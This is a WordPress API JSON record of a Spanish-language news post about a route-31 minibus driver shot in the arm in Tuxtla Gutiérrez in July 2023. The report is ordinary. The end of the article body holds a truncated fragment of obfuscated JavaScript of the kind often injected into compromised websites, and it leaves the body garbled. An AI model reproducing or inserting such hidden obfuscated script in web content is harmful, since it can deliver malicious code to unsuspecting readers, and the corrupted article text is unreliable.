{"id":11032,"date":"2023-07-19T23:51:42","date_gmt":"2023-07-19T23:51:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11032"},"modified":"2023-07-19T23:51:43","modified_gmt":"2023-07-19T23:51:43","slug":"disparan-contra-conductor-de-colectivo-de-la-ruta-31","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11032","title":{"rendered":"Disparan contra conductor de colectivo de la ruta 31"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689810467585-768x1024.jpg\" alt=\"\" class=\"wp-image-11033\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689810467585-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689810467585-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1689810467585.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 19 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana fue baleado el conductor de una unidad colectivo de la ruta 31 con n\u00famero econ\u00f3mico 07 en la Colonia Chiapas Solidario de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, todo ocurri\u00f3 sobre la Calle Nopal y Avenida Ziquet\u00e9, cuando el conductor de la unidad se baj\u00f3 a comprar un refresco en una tienda de abarrotes.<\/p>\n\n\n\n<p>Justo en ese momento otro sujeto ingres\u00f3 y le dispar\u00f3 en la espalda, hiri\u00e9ndolo en el brazo.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, el herido subi\u00f3 a su unidad y se fue con rumbo desconocido.<\/p>\n\n\n\n<p>En el lugar qued\u00f3 un casquillo percutido.<\/p>\n\n\n\n<p>Al lugar arribaron polic\u00edas para tomar conocimiento de este hecho.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 19 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana fue baleado el conductor de una unidad colectivo de la ruta 31 con n\u00famero econ\u00f3mico 07 en la Colonia Chiapas Solidario de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, todo ocurri\u00f3 sobre la Calle Nopal y Avenida Ziquet\u00e9, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11033,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11032","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11032","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11032"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11032\/revisions"}],"predecessor-version":[{"id":11034,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11032\/revisions\/11034"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11033"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11032"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11032"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11032"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}